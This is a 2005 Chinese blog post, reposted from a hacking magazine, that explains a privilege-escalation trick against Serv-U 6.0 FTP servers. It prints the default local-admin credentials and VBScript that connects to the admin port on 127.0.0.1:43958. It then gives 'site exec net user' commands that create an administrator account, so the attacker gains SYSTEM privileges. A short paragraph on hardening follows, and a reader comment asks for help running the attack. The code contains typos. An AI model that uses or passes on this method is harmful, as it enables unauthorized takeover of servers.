«
»

论Serv-u6.0提权新招


刚看到这个

来自:黑防4月份期刊

适用环境:服务器禁用FSO,关掉Wscript.shelll,没有执行权限。

限制:没有更改管理员的密码,或者破解出了Serv-U的管理员的密码。Serv-U默认用户名:localadministrator 密码:#|@$ak#.|k;0@p 下面用MSWinsock。Winsock建立一个连接,并且以System权限添加超级用户,代码如下:
Dim revdata

Dim sendata

Set sock=createobject(“MSWinsock.Winsock”)

Sock.protocol=0

Sock.connect ”127.0.0.1″,43958

Sendata=”LocalAdministrator”& chr(10) &chr(13)

Sock.senddata snedata

Sendata=”#|@$ak#.|k;0@p” &chr(10) &chr(13)

Sock.senddata.sendata

使用这个代码就可以连上FTP了,接下来用Sock.senddata sendata 发送添加有执行权限用户的命令,想必大家该知道怎么做了吧,对了,就是用”site exec net user hacker hacker /add” ”site exec net localgroup administrators hacker /add”

呵呵,就这样系统权限到手了,祝大家好运

对于这个问题很容易解决的,就是降低System用户组的权限,把他降低为user级别,不过要控制Serv-u对其下管理目录有完全可读写的权限,再就是修改默认管理端口,设定Serv-u组只能为administrators组读取,这样就很难拿到INI文件了,因为这是本机管理IP,所有在IP策略管理中写没什么用处,一切被黑的服务器都是细节没做到位,这篇主要是用Serv-u作为服务运行时使用System用户组的权限,设定好System的权限,基本就没什么问题了,当然人家拿到Admin的话,那我也没办法

This entry was posted on 星期天, 四月 10th, 2005 and is filed under 系统. You can follow any responses to this entry through RSS 2.0. You can skip to the end and leave a response. Pinging is currently not allowed.

  1. #1 by xl9980 on 六月 13th, 2005

    我想请问,原文里 用MSWinsock。Winsock建立一个连接 这句话如何实现呢?难道是写一个 如上面代码的VBScript 教本?
    然后如何链接远程FTP呢?
    请指教!
    我的QQ 8326186

    Quote
(will not be published)

  1. No trackbacks yet.